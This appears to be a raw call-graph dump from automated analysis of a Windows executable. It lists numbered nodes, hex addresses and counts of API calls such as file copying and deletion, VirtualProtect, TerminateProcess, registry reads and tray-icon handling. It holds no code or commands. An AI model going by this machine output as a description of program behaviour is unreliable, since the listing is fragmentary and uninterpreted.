6aa961 22 API calls 97032->97033 97034 70d826 97033->97034 97035 6aa961 22 API calls 97034->97035 97036 70d82e 97035->97036 97037 6aa961 22 API calls 97036->97037 97038 70d836 97037->97038 97039 6a525f 22 API calls 97038->97039 97040 70d84d 97039->97040 97041 6a525f 22 API calls 97040->97041 97042 70d866 97041->97042 97043 6a4c6d 22 API calls 97042->97043 97044 70d872 97043->97044 97045 70d885 97044->97045 97046 6a93b2 22 API calls 97044->97046 97047 6a4c6d 22 API calls 97045->97047 97046->97045 97048 70d88e 97047->97048 97049 70d89e 97048->97049 97050 6a93b2 22 API calls 97048->97050 97051 70d8b0 97049->97051 97052 6aa8c7 22 API calls 97049->97052 97050->97049 97053 6a6350 22 API calls 97051->97053 97052->97051 97054 70d8bb 97053->97054 97148 70d978 22 API calls 97054->97148 97056 70d8ca 97149 70d978 22 API calls 97056->97149 97058 70d8dd 97059 6a4c6d 22 API calls 97058->97059 97060 70d8e7 97059->97060 97061 70d8ec 97060->97061 97062 70d8fe 97060->97062 97063 6a33c6 22 API calls 97061->97063 97064 6a4c6d 22 API calls 97062->97064 97065 70d8f9 97063->97065 97066 70d907 97064->97066 97070 6a6350 22 API calls 97065->97070 97067 70d925 97066->97067 97069 6a33c6 22 API calls 97066->97069 97068 6a6350 22 API calls 97067->97068 97068->97071 97069->97065 97070->97067 97071->96921 97073 712954 __wsopen_s 97072->97073 97074 6bfe0b 22 API calls 97073->97074 97075 712971 97074->97075 97076 6a5722 22 API calls 97075->97076 97077 71297b 97076->97077 97078 71274e 27 API calls 97077->97078 97079 712986 97078->97079 97080 6a511f 64 API calls 97079->97080 97081 71299b 97080->97081 97082 712a6c 97081->97082 97083 7129bf 97081->97083 97084 712e66 75 API calls 97082->97084 97085 712e66 75 API calls 97083->97085 97100 712a38 97084->97100 97086 7129c4 97085->97086 97092 712a75 messages 97086->97092 97163 6cd583 26 API calls 97086->97163 97088 6a50f5 40 API calls 97089 712a91 97088->97089 97090 6a50f5 40 API calls 97089->97090 97091 712aa1 97090->97091 97094 6a50f5 40 API calls 97091->97094 97092->96928 97093 7129ed 97164 6cd583 26 API calls 97093->97164 97096 712abc 97094->97096 97097 6a50f5 40 API calls 97096->97097 97098 712acc 97097->97098 97099 6a50f5 40 API calls 97098->97099 97101 712ae7 97099->97101 97100->97088 97100->97092 97102 6a50f5 40 API calls 97101->97102 97103 712af7 97102->97103 97104 6a50f5 40 API calls 97103->97104 97105 712b07 97104->97105 97106 6a50f5 40 API calls 97105->97106 97107 712b17 97106->97107 97150 713017 GetTempPathW GetTempFileNameW 97107->97150 97109 712b22 97110 6ce5eb 29 API calls 97109->97110 97112 712b33 97110->97112 97111 6ce678 67 API calls 97113 712bf8 97111->97113 97112->97092 97114 6a50f5 40 API calls 97112->97114 97123 712bed 97112->97123 97151 6cdbb3 97112->97151 97115 712c12 97113->97115 97116 712bfe DeleteFileW 97113->97116 97114->97112 97117 712c91 CopyFileW 97115->97117 97122 712c18 97115->97122 97116->97092 97118 712ca7 DeleteFileW 97117->97118 97119 712cb9 DeleteFileW 97117->97119 97118->97092 97160 712fd8 CreateFileW 97119->97160 97165 7122ce 79 API calls 97122->97165 97123->97111 97125 712c7c 97125->97119 97126 712c80 DeleteFileW 97125->97126 97126->97092 97128 6ab57f 97127->97128 97129 6ab578 97127->97129 97128->96857 97129->97128 97212 6c62d1 39 API calls _strftime 97129->97212 97131 6ab5c2 97131->96857 97132->96889 97133->96902 97135 6a6d91 97134->97135 97136 6a6d34 97134->97136 97137 6a93b2 22 API calls 97135->97137 97136->97135 97138 6a6d3f 97136->97138 97144 6a6d62 __fread_nolock 97137->97144 97139 6a6d5a 97138->97139 97140 6e4c9d 97138->97140 97142 6a6f34 22 API calls 97139->97142 97141 6bfddb 22 API calls 97140->97141 97143 6e4ca7 97141->97143 97142->97144 97145 6bfe0b 22 API calls 97143->97145 97144->96997 97146 6e4cda 97145->97146 97147->97012 97148->97056 97149->97058 97150->97109 97152 6cdbdd 97151->97152 97153 6cdbc1 97151->97153 97152->97112 97153->97152 97154 6cdbcd 97153->97154 97155 6cdbe3 97153->97155 97169 6cf2d9 20 API calls _abort 97154->97169 97166 6cd9cc 97155->97166 97158 6cdbd2 97170 6d27ec 26 API calls _strftime 97158->97170 97161 713013 97160->97161 97162 712fff SetFileTime CloseHandle 97160->97162 97161->97092 97162->97161 97163->97093 97164->97100 97165->97125 97171 6cd97b 97166->97171 97168 6cd9f0 97168->97152 97169->97158 97170->97152 97172 6cd987 BuildCatchObjectHelperInternal 97171->97172 97179 6c918d EnterCriticalSection 97172->97179 97174 6cd995 97180 6cd9f4 97174->97180 97178 6cd9b3 __wsopen_s 97178->97168 97179->97174 97188 6d49a1 97180->97188 97186 6cd9a2 97187 6cd9c0 LeaveCriticalSection __fread_nolock 97186->97187 97187->97178 97189 6cd955 __fread_nolock 26 API calls 97188->97189 97190 6d49b0 97189->97190 97191 6df89b __fread_nolock 26 API calls 97190->97191 97193 6d49b6 97191->97193 97192 6cda09 97197 6cda3a 97192->97197 97193->97192 97209 6d3820 21 API calls 2 library calls 97193->97209 97195 6d4a15 97196 6d29c8 _free 20 API calls 97195->97196 97196->97192 97200 6cda4c 97197->97200 97204 6cda24 97197->97204 97198 6cda5a 97210 6cf2d9 20 API calls _abort 97198->97210 97200->97198 97202 6cda85 __fread_nolock 97200->97202 97200->97204 97201 6cda5f 97211 6d27ec 26 API calls _strftime 97201->97211 97202->97204 97205 6cdc0b 62 API calls 97202->97205 97206 6cd955 __fread_nolock 26 API calls 97202->97206 97207 6d59be __wsopen_s 62 API calls 97202->97207 97208 6d4a56 62 API calls 97204->97208 97205->97202 97206->97202 97207->97202 97208->97186 97209->97195 97210->97201 97211->97204 97212->97131 97213->96939 97215 70d4d5 97214->97215 97216 70dbdc GetFileAttributesW 97214->97216 97215->96735 97216->97215 97217 70dbe8 FindFirstFileW 97216->97217 97217->97215 97218 70dbf9 FindClose 97217->97218 97218->97215 97248 6a6270 97219->97248 97221 6a9fd2 97222 6aa4a1 22 API calls 97221->97222 97223 6a9fec 97222->97223 97223->96950 97226 6ef7c4 97258 7096e2 84 API calls __wsopen_s 97226->97258 97227 6ef699 97235 6bfddb 22 API calls 97227->97235 97228 6aa405 97228->97223 97259 7096e2 84 API calls __wsopen_s 97228->97259 97230 6aa4a1 22 API calls 97246 6a9eb5 97230->97246 97232 6aa6c3 22 API calls 97232->97246 97234 6ef7d2 97236 6aa4a1 22 API calls 97234->97236 97237 6ef754 97235->97237 97238 6ef7e8 97236->97238 97239 6bfe0b 22 API calls 97237->97239 97238->97223 97241 6aa12c __fread_nolock 97239->97241 97241->97226 97241->97228 97242 6aa587 22 API calls 97242->97246 97243 6aaec9 22 API calls 97244 6aa0db CharUpperBuffW 97243->97244 97254 6aa673 22 API calls 97244->97254 97246->97221 97246->97226 97246->97227 97246->97228 97246->97230 97246->97232 97246->97241 97246->97242 97246->97243 97253 6a4573 41 API calls _wcslen 97246->97253 97255 6a48c8 23 API calls 97246->97255 97256 6a49bd 22 API calls __fread_nolock 97246->97256 97257 6aa673 22 API calls 97246->97257 97247->96954 97249 6bfe0b 22 API calls 97248->97249 97250 6a6295 97249->97250 97251 6bfddb 22 API calls 97250->97251 97252 6a62a3 97251->97252 97252->97246 97253->97246 97254->97246 97255->97246 97256->97246 97257->97246 97258->97234 97259->97223 97261 6a7510 53 API calls 97260->97261 97262 727f90 97261->97262 97285 727fd5 messages 97262->97285 97298 728cd3 97262->97298 97264 728281 97265 72844f 97264->97265 97269 72828f 97264->97269 97339 728ee4 60 API calls 97265->97339 97268 72845e 97268->97269 97270 72846a 97268->97270 97311 727e86 97269->97311 97270->97285 97271 6a7510 53 API calls 97288 728049 97271->97288 97276 7282c8 97326 6bfc70 97276->97326 97279 728302 97333 6a63eb 22 API calls 97279->97333 97280 7282e8 97332 71359c 82 API calls __wsopen_s 97280->97332 97283 7282f3 GetCurrentProcess TerminateProcess 97283->97279 97284 728311 97334 6a6a50 22 API calls 97284->97334 97285->96957 97287 72832a 97297 728352 97287->97297 97335 6b04f0 22 API calls 97287->97335 97288->97264 97288->97271 97288->97285 97330 70417d 22 API calls __fread_nolock 97288->97330 97331 72851d 42 API calls _strftime 97288->97331 97290 7284c5 97290->97285 97293 7284d9 FreeLibrary 97290->97293 97291 728341 97336 728b7b 75 API calls 97291->97336 97293->97285 97297->97290 97337 6b04f0 22 API calls 97297->97337 97338 6aaceb 23 API calls messages 97297->97338 97340 728b7b 75 API calls 97297->97340 97299 6aaec9 22 API calls 97298->97299 97300 728cee CharLowerBuffW 97299->97300 97341 708e54 97300->97341 97304 6aa961 22 API calls 97305 728d2a 97304->97305 97306 6a6d25 22 API calls 97305->97306 97307 728d3e 97306->97307 97308 6a93b2 22 API calls 97307->97308 97310 728d48 _wcslen 97308->97310 97309 728e5e _wcslen 97309->97288 97310->97309 97348 72851d 42 API calls _strftime 97310->97348 97312 727eec 97311->97312 97313 727ea1 97311->97313 97317 729096 97312->97317 97314 6bfe0b 22 API calls 97313->97314 97315 727ec3 97314->97315 97315->97312 97316 6bfddb 22 API calls 97315->97316 97316->97315 97318 7292ab messages 97317->97318 97325 7290ba _strcat _wcslen 97317->97325 97318->97276 97319 6ab38f 39 API calls 97319->97325 97320 6ab567 39 API calls 97320->97325 97321 6ab6b5 39 API calls 97321->97325 97322 6a7510 53 API calls 97322->97325 97323 6cea0c 21 API calls ___std_exception_copy 97323->97325 97325->97318 97325->97319 97325->97320 97325->97321 97325->97322 97325->97323 97351 70efae 24 API calls _wcslen 97325->97351 97328 6bfc85 97326->97328 97327 6bfd1d VirtualProtect 97329 6bfceb 97327->97329 97328->97327 97328->97329 97329->97279 97329->97280 97330->97288 97331->97288 97332->97283 97333->97284 97334->97287 97335->97291 97336->97297 97337->97297 97338->97297 97339->97268 97340->97297 97343 708e74 _wcslen 97341->97343 97342 708f63 97342->97304 97342->97310 97343->97342 97344 708f68 97343->97344 97345 708ea9 97343->97345 97344->97342 97350 6bce60 41 API calls 97344->97350 97345->97342 97349 6bce60 41 API calls 97345->97349 97348->97309 97349->97345 97350->97344 97351->97325 97353 6aae01 97352->97353 97356 6aae1c messages 97352->97356 97354 6aaec9 22 API calls 97353->97354 97355 6aae09 CharUpperBuffW 97354->97355 97355->97356 97356->96754 97358 6aacae 97357->97358 97359 6aacd1 97358->97359 97387 71359c 82 API calls __wsopen_s 97358->97387 97359->96806 97362 6efadb 97361->97362 97363 6aad92 97361->97363 97364 6bfddb 22 API calls 97363->97364 97365 6aad99 97364->97365 97388 6aadcd 97365->97388 97368->96804 97369->96797 97370->96797 97371->96758 97372->96809 97373->96773 97374->96809 97375->96809 97376->96806 97377->96806 97378->96806 97379->96806 97380->96806 97381->96806 97382->96785 97383->96809 97384->96792 97385->96800 97386->96809 97387->97359 97394 6aaddd 97388->97394 97389 6aadb6 97389->96806 97390 6bfddb 22 API calls 97390->97394 97391 6aa961 22 API calls 97391->97394 97392 6aa8c7 22 API calls 97392->97394 97393 6aadcd 22 API calls 97393->97394 97394->97389 97394->97390 97394->97391 97394->97392 97394->97393 97396 6b0863 messages 97395->97396 97397 6b06bd 97395->97397 97398 6b0d36 97396->97398 97399 6b0847 messages 97396->97399 97402 6f5ffd 97396->97402 97406 6b082a messages 97396->97406 97397->97396 97397->97398 97397->97399 97405 6b081e 97397->97405 97397->97406 97398->97399 97417 6bacd5 39 API calls 97398->97417 97399->96828 97404 6f600f 97402->97404 97416 6ccf65 39 API calls 97402->97416 97404->96828 97405->97406 97408 6f5e15 97405->97408 97406->97399 97406->97402 97415 6bce17 22 API calls messages 97406->97415 97414 6ccf65 39 API calls 97408->97414 97409->96828 97410->96834 97411->96834 97412->96832 97413->96834 97414->97408 97415->97406 97416->97404 97417->97399 97418 6d8402 97423 6d81be 97418->97423 97421 6d842a 97428 6d81ef try_get_first_available_module 97423->97428 97425 6d83ee 97442 6d27ec 26 API calls _strftime 97425->97442 97427 6d8343 97427->97421 97435 6e0984 97427->97435 97431 6d8338 97428->97431 97438 6c8e0b 40 API calls 2 library calls 97428->97438 97430 6d838c 97430->97431 97439 6c8e0b 40 API calls 2 library calls 97430->97439 97431->97427 97441 6cf2d9 20 API calls _abort 97431->97441 97433 6d83ab 97433->97431 97440 6c8e0b 40 API calls 2 library calls 97433->97440 97443 6e0081 97435->97443 97437 6e099f 97437->97421 97438->97430 97439->97433 97440->97431 97441->97425 97442->97427 97445 6e008d BuildCatchObjectHelperInternal 97443->97445 97444 6e009b 97501 6cf2d9 20 API calls _abort 97444->97501 97445->97444 97448 6e00d4 97445->97448 97447 6e00a0 97502 6d27ec 26 API calls _strftime 97447->97502 97454 6e065b 97448->97454 97453 6e00aa __wsopen_s 97453->97437 97504 6e042f 97454->97504 97457 6e068d 97536 6cf2c6 20 API calls _abort 97457->97536 97458 6e06a6 97522 6d5221 97458->97522 97461 6e06ab 97462 6e06cb 97461->97462 97463 6e06b4 97461->97463 97535 6e039a CreateFileW 97462->97535 97538 6cf2c6 20 API calls _abort 97463->97538 97467 6e06b9 97539 6cf2d9 20 API calls _abort 97467->97539 97469 6e0781 GetFileType 97470 6e078c GetLastError 97469->97470 97475 6e07d3 97469->97475 97542 6cf2a3 20 API calls 2 library calls 97470->97542 97471 6e0756 GetLastError 97541 6cf2a3 20 API calls 2 library calls 97471->97541 97472 6e0704 97472->97469 97472->97471 97540 6e039a CreateFileW 97472->97540 97544 6d516a 21 API calls 3 library calls 97475->97544 97477 6e0692 97537 6cf2d9 20 API calls _abort 97477->97537 97478 6e079a CloseHandle 97478->97477 97481 6e07c3 97478->97481 97480 6e0749 97480->97469 97480->97471 97543 6cf2d9 20 API calls _abort 97481->97543 97482 6e07f4 97484 6e0840 97482->97484 97545 6e05ab 72 API calls 4 library calls 97482->97545 97489 6e086d 97484->97489 97546 6e014d 72 API calls 4 library calls 97484->97546 97485 6e07c8 97485->97477 97488 6e0866 97488->97489 97490 6e087e 97488->97490 97491 6d86ae __wsopen_s 29 API calls 97489->97491 97492 6e00f8 97490->97492 97493 6e08fc CloseHandle 97490->97493 97491->97492 97503 6e0121 LeaveCriticalSection __wsopen_s 97492->97503 97547 6e039a CreateFileW 97493->97547 97495 6e0927 97496 6e095d 97495->97496 97497 6e0931 GetLastError 97495->97497 97496->97492 97548 6cf2a3 20 API calls 2 library calls 97497->97548 97499 6e093d 97549 6d5333 21 API calls 3 library calls 97499->97549 97501->97447 97502->97453 97503->97453 97505 6e046a 97504->97505 97506 6e0450 97504->97506 97550 6e03bf 97505->97550 97506->97505 97557 6cf2d9 20 API calls _abort 97506->97557 97509 6e04a2 97519 6e04d1 97509->97519 97559 6cf2d9 20 API calls _abort 97509->97559 97510 6e045f 97558 6d27ec 26 API calls _strftime 97510->97558 97514 6e051f 97516 6e059e 97514->97516 97520 6e0524 97514->97520 97515 6e04c6 97560 6d27ec 26 API calls _strftime 97515->97560 97562 6d27fc 11 API calls _abort 97516->97562 97519->97520 97561 6cd70d 26 API calls 2 library calls 97519->97561 97520->97457 97520->97458 97521 6e05aa 97523 6d522d BuildCatchObjectHelperInternal 97522->97523 97565 6d2f5e EnterCriticalSection 97523->97565 97525 6d527b 97566 6d532a 97525->97566 97526 6d5234 97526->97525 97527 6d5259 97526->97527 97532 6d52c7 EnterCriticalSection 97526->97532 97569 6d5000 21 API calls 3 library calls 97527->97569 97530 6d52a4 __wsopen_s 97530->97461 97531 6d525e 97531->97525 97570 6d5147 EnterCriticalSection 97531->97570 97532->97525 97533 6d52d4 LeaveCriticalSection 97532->97533 97533->97526 97535->97472 97536->97477 97537->97492 97538->97467 97539->97477 97540->97480 97541->97477 97542->97478 97543->97485 97544->97482 97545->97484 97546->97488 97547->97495 97548->97499 97549->97496 97552 6e03d7 97550->97552 97551 6e03f2 97551->97509 97552->97551 97563 6cf2d9 20 API calls _abort 97552->97563 97554 6e0416 97564 6d27ec 26 API calls _strftime 97554->97564 97556 6e0421 97556->97509 97557->97510 97558->97505 97559->97515 97560->97519 97561->97514 97562->97521 97563->97554 97564->97556 97565->97526 97571 6d2fa6 LeaveCriticalSection 97566->97571 97568 6d5331 97568->97530 97569->97531 97570->97525 97571->97568 97572 6a105b 97577 6a344d 97572->97577 97574 6a106a 97608 6c00a3 29 API calls __onexit 97574->97608 97576 6a1074 97578 6a345d __wsopen_s 97577->97578 97579 6aa961 22 API calls 97578->97579 97580 6a3513 97579->97580 97581 6a3a5a 24 API calls 97580->97581 97582 6a351c 97581->97582 97609 6a3357 97582->97609 97585 6a33c6 22 API calls 97586 6a3535 97585->97586 97587 6a515f 22 API calls 97586->97587 97588 6a3544 97587->97588 97589 6aa961 22 API calls 97588->97589 97590 6a354d 97589->97590 97591 6aa6c3 22 API calls 97590->97591 97592 6a3556 RegOpenKeyExW 97591->97592 97593 6e3176 RegQueryValueExW 97592->97593 97597 6a3578 97592->97597 97594 6e320c RegCloseKey 97593->97594 97595 6e3193 97593->97595 97594->97597 97607 6e321e _wcslen 97594->97607 97596 6bfe0b 22 API calls 97595->97596 97598 6e31ac 97596->97598 97597->97574 97600 6a5722 22 API calls 97598->97600 97599 6a4c6d 22 API calls 97599->97607 97601 6e31b7 RegQueryValueExW 97600->97601 97602 6e31d4 97601->97602 97604 6e31ee messages 97601->97604 97603 6a6b57 22 API calls 97602->97603 97603->97604 97604->97594 97605 6a9cb3 22 API calls 97605->97607 97606 6a515f 22 API calls 97606->97607 97607->97597 97607->97599 97607->97605 97607->97606 97608->97576 97610 6e1f50 __wsopen_s 97609->97610 97611 6a3364 GetFullPathNameW 97610->97611 97612 6a3386 97611->97612 97613 6a6b57 22 API calls 97612->97613 97614 6a33a4 97613->97614 97614->97585 97615 6a1098 97620 6a42de 97615->97620 97619 6a10a7 97621 6aa961 22 API calls 97620->97621 97622 6a42f5 GetVersionExW 97621->97622 97623 6a6b57 22 API calls 97622->97623 97624 6a4342 97623->97624 97625 6a93b2 22 API calls 97624->97625 97637 6a4378 97624->97637 97626 6a436c 97625->97626 97628 6a37a0 22 API calls 97626->97628 97627 6a441b GetCurrentProcess IsWow64Process 97629 6a4437 97627->97629 97628->97637 97630 6a444f LoadLibraryA 97629->97630 97631 6e3824 GetSystemInfo 97629->97631 97632 6a449c GetSystemInfo 97630->97632 97633 6a4460 GetProcAddress 97630->97633 97636 6a4476 97632->97636 97633->97632 97635 6a4470 GetNativeSystemInfo 97633->97635 97634 6e37df 97635->97636 97638 6a447a FreeLibrary 97636->97638 97639 6a109d 97636->97639 97637->97627 97637->97634 97638->97639 97640 6c00a3 29 API calls __onexit 97639->97640 97640->97619 97641 6af7bf 97642 6af7d3 97641->97642 97643 6afcb6 97641->97643 97645 6afcc2 97642->97645 97646 6bfddb 22 API calls 97642->97646 97677 6aaceb 23 API calls messages 97643->97677 97678 6aaceb 23 API calls messages 97645->97678 97648 6af7e5 97646->97648 97648->97645 97649 6af83e 97648->97649 97650 6afd3d 97648->97650 97652 6b1310 235 API calls 97649->97652 97669 6aed9d messages 97649->97669 97679 711155 22 API calls 97650->97679 97673 6aec76 messages 97652->97673 97653 6f4beb 97683 71359c 82 API calls __wsopen_s 97653->97683 97654 6bfddb 22 API calls 97654->97673 97655 6b06a0 41 API calls 97655->97673 97656 6afef7 97660 6aa8c7 22 API calls 97656->97660 97656->97669 97658 6f4b0b 97681 71359c 82 API calls __wsopen_s 97658->97681 97659 6aa8c7 22 API calls 97659->97673 97660->97669 97661 6f4600 97664 6aa8c7 22 API calls 97661->97664 97661->97669 97664->97669 97666 6c0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97666->97673 97667 6afbe3 97667->97669 97670 6f4bdc 97667->97670 97675 6af3ae messages 97667->97675 97668 6aa961 22 API calls 97668->97673 97682 71359c 82 API calls __wsopen_s 97670->97682 97672 6c00a3 29 API calls pre_c_initialization 97672->97673 97673->97653 97673->97654 97673->97655 97673->97656 97673->97658 97673->97659 97673->97661 97673->97666 97673->97667 97673->97668 97673->97669 97673->97672 97674 6c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97673->97674 97673->97675 97676 6b01e0 235 API calls 2 library calls 97673->97676 97674->97673 97675->97669 97680 71359c 82 API calls __wsopen_s 97675->97680 97676->97673 97677->97645 97678->97650 97679->97669 97680->97669 97681->97669 97682->97653 97683->97669 97684 6b0b9d 97694 6b0ba6 __fread_nolock 97684->97694 97685 6a7510 53 API calls 97685->97694 97686 6f5cb8 97696 6a4a88 22 API calls __fread_nolock 97686->97696 97688 6f5cc4 97692 6aa8c7 22 API calls 97688->97692 97693 6b0847 __fread_nolock 97688->97693 97689 6b0bf7 97691 6aa587 22 API calls 97689->97691 97690 6bfddb 22 API calls 97690->97694 97691->97693 97692->97693 97694->97685 97694->97686 97694->97689 97694->97690 97694->97693 97695 6bfe0b 22 API calls 97694->97695 97695->97694 97696->97688 97697 6c03fb 97698 6c0407 BuildCatchObjectHelperInternal 97697->97698 97726 6bfeb1 97698->97726 97700 6c040e 97701 6c0561 97700->97701 97704 6c0438 97700->97704 97753 6c083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97701->97753 97703 6c0568 97754 6c4e52 28 API calls _abort 97703->97754 97715 6c0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97704->97715 97737 6d247d 97704->97737 97706 6c056e 97755 6c4e04 28 API calls _abort 97706->97755 97710 6c0576 97711 6c0457 97713 6c04d8 97745 6c0959 97713->97745 97715->97713 97749 6c4e1a 38 API calls 2 library calls 97715->97749 97717 6c04de 97718 6c04f3 97717->97718 97750 6c0992 GetModuleHandleW 97718->97750 97720 6c04fa 97720->97703 97721 6c04fe 97720->97721 97722 6c0507 97721->97722 97751 6c4df5 28 API calls _abort 97721->97751 97752 6c0040 13 API calls 2 library calls 97722->97752 97725 6c050f 97725->97711 97727 6bfeba 97726->97727 97756 6c0698 IsProcessorFeaturePresent 97727->97756 97729 6bfec6 97757 6c2c94 10 API calls 3 library calls 97729->97757 97731 6bfecb 97732 6bfecf 97731->97732 97758 6d2317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97731->97758 97732->97700 97734 6bfed8 97735 6bfee6 97734->97735 97759 6c2cbd 8 API calls 3 library calls 97734->97759 97735->97700 97738 6d2494 97737->97738 97739 6c0a8c _ValidateLocalCookies 5 API calls 97738->97739 97740 6c0451 97739->97740 97740->97711 97741 6d2421 97740->97741 97743 6d2450 97741->97743 97742 6c0a8c _ValidateLocalCookies 5 API calls 97744 6d2479 97742->97744 97743->97742 97744->97715 97760 6c2340 97745->97760 97748 6c097f 97748->97717 97749->97713 97750->97720 97751->97722 97752->97725 97753->97703 97754->97706 97755->97710 97756->97729 97757->97731 97758->97734 97759->97732 97761 6c096c GetStartupInfoW 97760->97761 97761->97748 97762 6a1033 97767 6a4c91 97762->97767 97766 6a1042 97768 6aa961 22 API calls 97767->97768 97769 6a4cff 97768->97769 97775 6a3af0 97769->97775 97772 6a4d9c 97773 6a1038 97772->97773 97778 6a51f7 22 API calls __fread_nolock 97772->97778 97774 6c00a3 29 API calls __onexit 97773->97774 97774->97766 97779 6a3b1c 97775->97779 97778->97772 97780 6a3b0f 97779->97780 97781 6a3b29 97779->97781 97780->97772 97781->97780 97782 6a3b30 RegOpenKeyExW 97781->97782 97782->97780 97783 6a3b4a RegQueryValueExW 97782->97783 97784 6a3b6b 97783->97784 97785 6a3b80 RegCloseKey 97783->97785 97784->97785 97785->97780 97786 6f3f75 97797 6bceb1 97786->97797 97788 6f3f8b 97796 6f4006 97788->97796 97806 6be300 23 API calls 97788->97806 97790 6abf40 235 API calls 97791 6f4052 97790->97791 97793 6f4a88 97791->97793 97808 71359c 82 API calls __wsopen_s 97791->97808 97794 6f3fe6 97794->97791 97807 711abf 22 API calls 97794->97807 97796->97790 97798 6bcebf 97797->97798 97799 6bced2 97797->97799 97809 6aaceb 23 API calls messages 97798->97809 97801 6bced7 97799->97801 97802 6bcf05 97799->97802 97803 6bfddb 22 API calls 97801->97803 97810 6aaceb 23 API calls messages 97802->97810 97805 6bcec9 97803->97805 97805->97788 97806->97794 97807->97796 97808->97793 97809->97805 97810->97805 97811 6a3156 97814 6a3170 97811->97814 97815 6a3187 97814->97815 97816 6a31eb 97815->97816 97817 6a318c 97815->97817 97855 6a31e9 97815->97855 97819 6e2dfb 97816->97819 97820 6a31f1 97816->97820 97821 6a3199 97817->97821 97822 6a3265 PostQuitMessage 97817->97822 97818 6a31d0 DefWindowProcW 97823 6a316a 97818->97823 97870 6a18e2 10 API calls 97819->97870 97824 6a31f8 97820->97824 97825 6a321d SetTimer RegisterWindowMessageW 97820->97825 97827 6e2e7c 97821->97827 97828 6a31a4 97821->97828 97822->97823 97833 6e2d9c 97824->97833 97834 6a3201 KillTimer 97824->97834 97825->97823 97829 6a3246 CreatePopupMenu 97825->97829 97875 70bf30 34 API calls ___scrt_fastfail 97827->97875 97830 6a31ae 97828->97830 97831 6e2e68 97828->97831 97829->97823 97837 6e2e4d 97830->97837 97838 6a31b9 97830->97838 97859 70c161 97831->97859 97840 6e2dd7 MoveWindow 97833->97840 97841 6e2da1 97833->97841 97866 6a30f2 Shell_NotifyIconW ___scrt_fastfail 97834->97866 97835 6e2e1c 97871 6be499 42 API calls 97835->97871 97837->97818 97874 700ad7 22 API calls 97837->97874 97844 6a31c4 97838->97844 97845 6a3253 97838->97845 97839 6e2e8e 97839->97818 97839->97823 97840->97823 97846 6e2dc6 SetFocus 97841->97846 97847 6e2da7 97841->97847 97844->97818 97872 6a30f2 Shell_NotifyIconW ___scrt_fastfail 97844->97872 97868 6a326f 44 API calls ___scrt_fastfail 97845->97868 97846->97823 97847->97844 97850 6e2db0 97847->97850 97848 6a3214 97867 6a3c50 DeleteObject DestroyWindow 97848->97867 97869 6a18e2 10 API calls 97850->97869 97853 6a3263 97853->97823 97855->97818 97857 6e2e41 97873 6a3837 49 API calls ___scrt_fastfail 97857->97873 97860 70c276 97859->97860 97861 70c179 ___scrt_fastfail 97859->97861 97860->97823 97876 6a3923 97861->97876 97863 70c25f KillTimer SetTimer 97863->97860 97864 70c1a0 97864->97863 97865 70c251 Shell_NotifyIconW 97864->97865 97865->97863 97866->97848 97867->97823 97868->97853 97869->97823 97870->97835 97871->97844 97872->97857 97873->97855 97874->97855 97875->97839 97877 6a393f 97876->97877 97896 6a3a13 97876->97896 97878 6a6270 22 API calls 97877->97878 97879 6a394d 97878->97879 97880 6a395a 97879->97880 97881 6e3393 LoadStringW 97879->97881 97882 6a6b57 22 API calls 97880->97882 97883 6e33ad 97881->97883 97884 6a396f 97882->97884 97887 6aa8c7 22 API calls 97883->97887 97891 6a3994 ___scrt_fastfail 97883->97891 97885 6a397c 97884->97885 97886 6e33c9 97884->97886 97885->97883 97888 6a3986 97885->97888 97889 6a6350 22 API calls 97886->97889 97887->97891 97890 6a6350 22 API calls 97888->97890 97892 6e33d7 97889->97892 97890->97891 97894 6a39f9 Shell_NotifyIconW 97891->97894 97892->97891 97893 6a33c6 22 API calls 97892->97893 97895 6e33f9 97893->97895 97894->97896 97897 6a33c6 22 API calls 97895->97897 97896->97864 97897->97891 97898 6a2e37 97899 6aa961 22 API calls 97898->97899 97900 6a2e4d 97899->97900 97977 6a4ae3 97900->97977 97902 6a2e6b 97903 6a3a5a 24 API calls 97902->97903 97904 6a2e7f 97903->97904 97905 6a9cb3 22 API calls 97904->97905 97906 6a2e8c 97905->97906 97907 6a4ecb 94 API calls 97906->97907 97908 6a2ea5 97907->97908 97909 6a2ead 97908->97909 97910 6e2cb0 97908->97910 97913 6aa8c7 22 API calls 97909->97913 97911 712cf9 80 API calls 97910->97911 97912 6e2cc3 97911->97912 97914 6e2ccf 97912->97914 97916 6a4f39 68 API calls 97912->97916 97915 6a2ec3 97913->97915 97919 6a4f39 68 API calls 97914->97919 97991 6a6f88 22 API calls 97915->97991 97916->97914 97918 6a2ecf 97921 6a9cb3 22 API calls 97918->97921 97920 6e2ce5 97919->97920 98007 6a3084 22 API calls 97920->98007 97922 6a2edc 97921->97922 97992 6aa81b 41 API calls 97922->97992 97925 6a2eec 97927 6a9cb3 22 API calls 97925->97927 97926 6e2d02 98008 6a3084 22 API calls 97926->98008 97929 6a2f12 97927->97929 97993 6aa81b 41 API calls 97929->97993 97930 6e2d1e 97932 6a3a5a 24 API calls 97930->97932 97934 6e2d44 97932->97934 97933 6a2f21 97936 6aa961 22 API calls 97933->97936 98009 6a3084 22 API calls 97934->98009 97938 6a2f3f 97936->97938 97937 6e2d50 97939 6aa8c7 22 API calls 97937->97939 97994 6a3084 22 API calls 97938->97994 97940 6e2d5e 97939->97940 98010 6a3084 22 API calls 97940->98010 97943 6a2f4b 97995 6c4a28 40 API calls 2 library calls 97943->97995 97944 6e2d6d 97948 6aa8c7 22 API calls 97944->97948 97946 6a2f59 97946->97920 97947 6a2f63 97946->97947 97996 6c4a28 40 API calls 2 library calls 97947->97996 97950 6e2d83 97948->97950 98011 6a3084 22 API calls 97950->98011 97951 6a2f6e 97951->97926 97953 6a2f78 97951->97953 97997 6c4a28 40 API calls 2 library calls 97953->97997 97954 6e2d90 97956 6a2f83 97956->97930 97957 6a2f8d 97956->97957 97998 6c4a28 40 API calls 2 library calls 97957->97998 97959 6a2f98 97960 6a2fdc 97959->97960 97999 6a3084 22 API calls 97959->97999 97960->97944 97961 6a2fe8 97960->97961 97961->97954 98001 6a63eb 22 API calls 97961->98001 97963 6a2fbf 97965 6aa8c7 22 API calls 97963->97965 97967 6a2fcd 97965->97967 97966 6a2ff8 98002 6a6a50 22 API calls 